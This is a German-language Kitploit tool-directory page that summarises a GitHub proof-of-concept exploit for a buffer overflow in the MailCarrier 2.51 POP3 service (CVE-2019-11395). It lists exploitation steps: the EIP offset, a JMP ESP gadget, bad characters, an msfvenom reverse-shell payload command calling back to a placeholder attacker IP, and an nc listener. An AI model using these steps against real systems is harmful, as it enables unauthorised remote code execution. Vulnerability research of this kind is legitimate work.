Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-11395 — Python-Exploit für CVE-2019-11395, einen Pufferüberlauf im MailCarrier 2.51 POP3-Dienst. Erzeugt eine Reverse-Shell-Nutzlast über msfvenom und erreicht die Remote-Codeausführung auf Windows-Zielen. | Kitploit
Tools/GitHubGitHub/caioprince/cve-2019-11395
Payload-GenerierungSchwachstellenanalyseExploitationShellcodePenetrationstestsBinary-Exploitation
GitHubcaioprince/cve-2019-11395

CVE-2019-11395

Python-Exploit für CVE-2019-11395, einen Pufferüberlauf im MailCarrier 2.51 POP3-Dienst. Erzeugt eine Reverse-Shell-Nutzlast über msfvenom und erreicht die Remote-Codeausführung auf Windows-Zielen.

Repository anzeigen
2vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-11395 Exploit 🛡️

Über CVE-2019-11395 🕵️

Die Sicherheitslücke CVE-2019-11395 beschreibt eine Pufferüberlauf-Schwachstelle in der MailCarrier 2.51 E-Mail-Anwendung, die eine Remote-Codeausführung ermöglicht. Die Schwachstelle tritt in den Prozessen SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP oder POP3 RETR auf.

Im Rahmen einer akademischen Studie lag der Fokus auf den POP3-Prozessen, um einen Proof of Concept (PoC) zu erstellen. Es wurde festgestellt, dass das Senden von 6000 Bytes an die Anwendung dazu führt, dass sie nicht mehr funktioniert, was die Pufferüberlauf-Schwachstelle offenbart.

Schritte zur Ausnutzung 🔍

  1. Verwendete msf-pattern_create -l 6000, um das EIP genau zu identifizieren.
  2. Identifizierte den EIP-Offset mit msf-pattern_offset -q 6E47386E -l 6000, was zu einem EIP-Offset von 5095 führte.
  3. Identifizierte expsrv.dll mit deaktiviertem ASLR, geeignet für einen JMP ESP.
  4. Identifizierte bad characters \x00\x0a\x0d während Tests auf ungültige Zeichen.
  • Erstellte Payload mit msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
  • Passte den CVE-2019-11395.py-Code an, um den Payload aufzunehmen.
  • Öffnete eine Verbindung mit nc -lnvp 4444 und führte den Exploit (CVE-2019-11395.py) aus, um Zugriff auf die Umgebung zu erhalten und die beschriebene CVE zu validieren.
  • Verwendung 🚀

    Befolgen Sie diese Schritte, um den Exploit zu nutzen:

    1. Generieren Sie den Payload mit msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
    2. Kopieren Sie die Ausgabe des msfvenom-Befehls.
    3. Passen Sie den CVE-2019-11395.py-Code an, um die Variable shellcode durch die Ausgabe des msfvenom-Befehls zu ersetzen.
    4. Führen Sie den Exploit (CVE-2019-11395.py) aus, um Zugriff auf die Umgebung zu erhalten und die beschriebene CVE zu validieren.

    Kompromittierte Umgebung 📸

    PoC CVE-2019-11395

    🔗 Verbinde dich mit mir

    Besuche mein Profil auf LinkedIn

    Tool herunterladen